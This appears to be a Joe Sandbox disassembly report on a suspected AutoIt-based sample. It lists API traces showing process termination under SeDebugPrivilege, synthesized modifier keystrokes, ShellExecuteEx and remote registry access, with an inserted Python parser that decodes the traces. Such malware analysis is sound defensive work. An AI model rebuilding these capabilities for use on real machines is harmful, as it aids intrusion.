                                      APIs
                                        • Part of subcall function 00976532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00976554
                                        • Part of subcall function 00976532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00976564
                                        • Part of subcall function 00976532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009765F9
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0099179A
                                      • GetLastError.KERNEL32 ref: 009917AD
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009917D9
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00991855
                                      • GetLastError.KERNEL32(00000000), ref: 00991860
                                      • CloseHandle.KERNEL32(00000000), ref: 00991895
                                      Strings
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 009758B8
                                      Strings
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0097A806
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ArraySafeVartype
                                      • String ID:
                                      • API String ID: 1725837607-0
                                      • Opcode ID: ffd11ee58ec9d7d719dd2bbacd2e0bbd4e676db8ed98b548507eb5a7d02cd4b5
                                      • Instruction ID: 40e6816e221ea3a3d282f161378b430fdb31018bfcf31ed0c93c34be6253def9
                                      • Opcode Fuzzy Hash: ffd11ee58ec9d7d719dd2bbacd2e0bbd4e676db8ed98b548507eb5a7d02cd4b5
                                      • Instruction Fuzzy Hash: 69C1B176A0520ADFDB04CF98C481BAEB7F5FF89311F208469E609E7291D734A941CF92
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00976B63
                                      • LoadStringW.USER32(00000000), ref: 00976B6A
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00976B80
                                      • LoadStringW.USER32(00000000), ref: 00976B87
                                      • _wprintf.LIBCMT ref: 00976BAD
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00976BCB
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00976BA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 3648134473-3128320259
                                      • Opcode ID: 808ff289fd9deb694f97936491606d0a3bcefb1afb65ae5237e8a80704ab900c
                                      • Instruction ID: 7ddacd7d0fdbd07ed57426ba7a9b71c0d39221fe42a48ead35d695a1915a560f
                                      • Opcode Fuzzy Hash: 808ff289fd9deb694f97936491606d0a3bcefb1afb65ae5237e8a80704ab900c
                                      • Instruction Fuzzy Hash: EA011DF6904208BFEB11ABA49E89EF6776CE708304F4045A5B75AE2041EA749E849B71
                                      APIs
                                        • Part of subcall function 00993C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00992BB5,?,?), ref: 00993C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00992BF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharConnectRegistryUpper
                                      • String ID:
                                      • API String ID: 2595220575-0
                                      • Opcode ID: 02f9cdc07234e7260436487b54e08ef60c6e7f6b74ad4d29ecc92ff85e97fb44
                                      • Instruction ID: c366f346c60b24e2034a396db23059388ac61960ff344f4cb3a9bd876726d5aa
                                      • Opcode Fuzzy Hash: 02f9cdc07234e7260436487b54e08ef60c6e7f6b74ad4d29ecc92ff85e97fb44
                                      • Instruction Fuzzy Hash: A8916971604201AFCB04EF58C891B6EB7E9FF98310F14885DF9969B2A2DB34E945DF42
                                      APIs
                                      • __mtinitlocknum.LIBCMT ref: 0095A991
                                        • Part of subcall function 00957D7C: __FF_MSGBANNER.LIBCMT ref: 00957D91
                                        • Part of subcall function 00957D7C: __NMSG_WRITE.LIBCMT ref: 00957D98
                                        • Part of subcall function 00957D7C: __malloc_crt.LIBCMT ref: 00957DB8
                                      • __lock.LIBCMT ref: 0095A9A4
                                      • __lock.LIBCMT ref: 0095A9F0
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,009E6DE0,00000018,00965E7B,?,00000000,00000109), ref: 0095AA0C
                                      • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0095AA29
                                      • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0095AA39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                      • String ID:
                                      • API String ID: 1422805418-0
                                      • Opcode ID: 6f9dbe39bbc8f1f6f22bc368ee888007a7f2c2846e4a941429a7c1dacdd360d0
                                      • Instruction ID: ac30a6395adb9630977ffff41a060531e1d290b489aaf5bf23522ee3ce8a38d7
                                      • Opcode Fuzzy Hash: 6f9dbe39bbc8f1f6f22bc368ee888007a7f2c2846e4a941429a7c1dacdd360d0
                                      • Instruction Fuzzy Hash: 29416B719002059BEB10CF6ADE4076CB7B5AF41336F208319EC25AB2D2E7B49948CB99
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00998EE4
                                      • GetDC.USER32(00000000), ref: 00998EEC
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00998EF7
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00998F03
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00998F3F
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00998F50
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0099BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00998F8A
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00998FAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: b872730996fe3bc7b9d1305332d831e1406de38db5ffd57103e20a788f18deab
                                      • Instruction ID: 26f6c58b99cc4f8c0d3c20e6f346bc3a524a0dbca66c3afd1ea09b40053b8072
                                      • Opcode Fuzzy Hash: b872730996fe3bc7b9d1305332d831e1406de38db5ffd57103e20a788f18deab
                                      • Instruction Fuzzy Hash: 20317C72105214BFEF108F54CD8AFAB3BADEB4A721F084169FE089A191D6759841CBB0
                                      APIs
                                      • select.WS2_32 ref: 00989691
                                      • WSAGetLastError.WS2_32(00000000), ref: 0098969E
                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 009896C8
                                      • WSAGetLastError.WS2_32(00000000), ref: 009896F8
                                      • htons.WS2_32(?), ref: 009897AA
                                      • inet_ntoa.WS2_32(?), ref: 00989765
                                        • Part of subcall function 0096D2FF: _strlen.LIBCMT ref: 0096D309
                                      • _strlen.LIBCMT ref: 00989800
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                      • String ID:
                                      • API String ID: 3480843537-0
                                      • Opcode ID: 1deb131caf2bf49147afb67c944d7000c63f4b513bb0cdbc94aabd8ca9f0b59a
                                      • Instruction ID: f3bffe8e81c4fd80a9a0a891ae0fdee8e714b8bae7208e8f2b431670975514e5
                                      • Opcode Fuzzy Hash: 1deb131caf2bf49147afb67c944d7000c63f4b513bb0cdbc94aabd8ca9f0b59a
                                      • Instruction Fuzzy Hash: FF81AB71508201ABC714EF64CC95F6BBBE8EFC9714F144A2DF5569B2A1EB30E904CB92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bdf4310f5535baf49e2f3bfb85dc140b1472ab04faf77937ef62a90fa992f3d
                                      • Instruction ID: 8a35c44bf2cffae8e113319661467cc8a37a2086198d9932ac2fff9b5a3dd79c
                                      • Opcode Fuzzy Hash: 4bdf4310f5535baf49e2f3bfb85dc140b1472ab04faf77937ef62a90fa992f3d
                                      • Instruction Fuzzy Hash: 96718DB1904109EFDF04CF98CC88EAEBB78FF85314F148289F915AA251C734AA05CFA5
                                      APIs
                                      • _memset.LIBCMT ref: 0099225A
                                      • _memset.LIBCMT ref: 00992323
                                      • ShellExecuteExW.SHELL32(?), ref: 00992368
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                        • Part of subcall function 0094C6F4: _wcscpy.LIBCMT ref: 0094C717
                                      • CloseHandle.KERNEL32(00000000), ref: 0099242F
                                      • FreeLibrary.KERNEL32(00000000), ref: 0099243E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                      • String ID: @
                                      • API String ID: 4082843840-2766056989
                                      • Opcode ID: c1c051c991089d74a34adefe66182d6ca913af771272cc61e6e139d28f826d99
                                      • Instruction ID: d157bb319469b58e06a0eda51e0fd65ed21ad4a968264225b48de44c9bdf332d
                                      • Opcode Fuzzy Hash: c1c051c991089d74a34adefe66182d6ca913af771272cc61e6e139d28f826d99
                                      • Instruction Fuzzy Hash: 547160B4900619AFCF05EF98D491AAEB7F5FF88710F108459E855AB391DB34AD40CF90
                                      APIs
                                      • GetParent.USER32(00000000), ref: 00973C02
                                      • GetKeyboardState.USER32(?), ref: 00973C17
                                      • SetKeyboardState.USER32(?), ref: 00973C78
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00973CA4
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00973CC1
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00973D05
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00973D26
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 510efe1093b6e9618804de0adc23a894442ac79305b9fd884ae96bc086048c50
                                      • Instruction ID: c7739e9e33363720ab8b01f4164348eb0fa45a81206bb60539dce1359b01ddd5
                                      • Opcode Fuzzy Hash: 510efe1093b6e9618804de0adc23a894442ac79305b9fd884ae96bc086048c50
                                      • Instruction Fuzzy Hash: 6251D3A25086D539FB3687248C46BB6BF9DAB46300F0CC588E4DD568C2D395EE84F760
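The function above is worth reading as a whole rather than as seven isolated calls: the message constant 0x0100 is WM_KEYDOWN and the wParam values 0x10, 0x11, 0x12 and 0x5B are the virtual-key codes for Shift, Ctrl, Alt and the left Windows key, so the routine saves the keyboard state, synthesizes modifier-key presses into a target window and restores the state afterwards. The following Python is an added example, not part of this report or of Joe Sandbox: it parses API trace lines in the report's own format (the sample trace is the one above, copied verbatim) and decodes only the Win32 constants whose values are fixed by the SDK headers. The `ApiCall` type and function names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the API trace of the function above, copied verbatim from this report.
TRACE = """\
• GetParent.USER32(00000000), ref: 00973C02
• GetKeyboardState.USER32(?), ref: 00973C17
• SetKeyboardState.USER32(?), ref: 00973C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00973CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00973CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00973D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00973D26
"""

# One trace line: optional "Part of subcall function XXXX:" prefix, Api.MODULE, an optional
# "(arg,arg,...)" list where "?" is an argument the sandbox could not resolve, then "ref: <va>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Only constants whose values are fixed by the Win32 headers are decoded here.
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
MESSAGE_APIS = {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report shows "?"
    ref: int                    # virtual address of the call site
    subcall_of: Optional[int]   # owning function for "Part of subcall" lines, else None


def parse_args(text: Optional[str]) -> List[Optional[int]]:
    if not text or not text.strip():
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def parse_trace(text: str) -> List[ApiCall]:
    """Parse every API line of a report trace; headers and unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        calls.append(ApiCall(m["api"], m["mod"], parse_args(m["args"]), int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_message(call: ApiCall) -> Optional[str]:
    """Name the window message of a Post/SendMessage call and, for key messages, the virtual key."""
    if call.api not in MESSAGE_APIS or len(call.args) < 3 or call.args[1] is None:
        return None
    msg, wparam = call.args[1], call.args[2]
    name = WINDOW_MESSAGES.get(msg, f"WM_0x{msg:04X}")
    if name in ("WM_KEYDOWN", "WM_KEYUP") and wparam is not None:
        return f"{name} {VIRTUAL_KEYS.get(wparam, f'VK_0x{wparam:02X}')}"
    return name


def injected_keys(calls: List[ApiCall]) -> List[str]:
    """Virtual keys pressed via WM_KEYDOWN, in call order: evidence of synthesized input."""
    keys = []
    for c in calls:
        decoded = decode_message(c)
        if decoded and decoded.startswith("WM_KEYDOWN "):
            keys.append(decoded.split(" ", 1)[1])
    return keys


if __name__ == "__main__":
    calls = parse_trace(TRACE)
    for c in calls:
        print(f"{c.ref:08X} {c.module}!{c.api} {decode_message(c) or ''}")
    print("keys injected:", injected_keys(calls))
```

Running it against other entries in this section works the same way; the parser also accepts the indented "Part of subcall function" lines and calls listed without an argument list (such as `select.WS2_32`). Undecoded constants are printed as raw hex rather than guessed.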
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00998FE7
                                      • GetWindowLongW.USER32(0164BC08,000000F0), ref: 0099901A
                                      • GetWindowLongW.USER32(0164BC08,000000F0), ref: 0099904F
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00999081
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009990AB
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 009990BC
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009990D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 573e4149cc56ef5c1a05f170c12c35b476d3e2c39160cc7f70a05643eaa11114
                                      • Instruction ID: 4a017546fcf0aadbaf0b519ece5213febe1f2ac02cd1fd378c16fb9550d6d0a8
                                      • Opcode Fuzzy Hash: 573e4149cc56ef5c1a05f170c12c35b476d3e2c39160cc7f70a05643eaa11114
                                      • Instruction Fuzzy Hash: A2310535658215DFDF208F5CDC85F6537A9FB4A724F144268F929CB2B1CB72A840EB81
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009708F2
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00970918
                                      • SysAllocString.OLEAUT32(00000000), ref: 0097091B
                                      • SysAllocString.OLEAUT32(?), ref: 00970939
                                      • SysFreeString.OLEAUT32(?), ref: 00970942
                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 00970967
                                      • SysAllocString.OLEAUT32(?), ref: 00970975
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 75bd135590c70bc1bb19b087399fbf3361c97ddad001cc1e1fc4fa07a05ef959
                                      • Instruction ID: 664b040e1e06a0da1875e50f3518ba2bd0ede5f500876859195eb9859d97b093
                                      • Opcode Fuzzy Hash: 75bd135590c70bc1bb19b087399fbf3361c97ddad001cc1e1fc4fa07a05ef959
                                      • Instruction Fuzzy Hash: 36219777605219AF9B109FA8CC88DBB73ACEB49370B00C525F919DB191E674EC458760
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      • Opcode ID: e8652d62f3b1ef1c3553a7da679ed5062c007f4b828cf628f2024cc0d46b0355
                                      • Instruction ID: c8b855d2186b281af770f2bd194f38d69d8ecc1049c8dc646f19afc6c526d1b6
                                      • Opcode Fuzzy Hash: e8652d62f3b1ef1c3553a7da679ed5062c007f4b828cf628f2024cc0d46b0355
                                      • Instruction Fuzzy Hash: 1C21377321821177C324EB259C12FBBB3ACEFE5310F54C429F98E97181E7659942C395
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009709CB
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009709F1
                                      • SysAllocString.OLEAUT32(00000000), ref: 009709F4
                                      • SysAllocString.OLEAUT32 ref: 00970A15
                                      • SysFreeString.OLEAUT32 ref: 00970A1E
                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 00970A38
                                      • SysAllocString.OLEAUT32(?), ref: 00970A46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
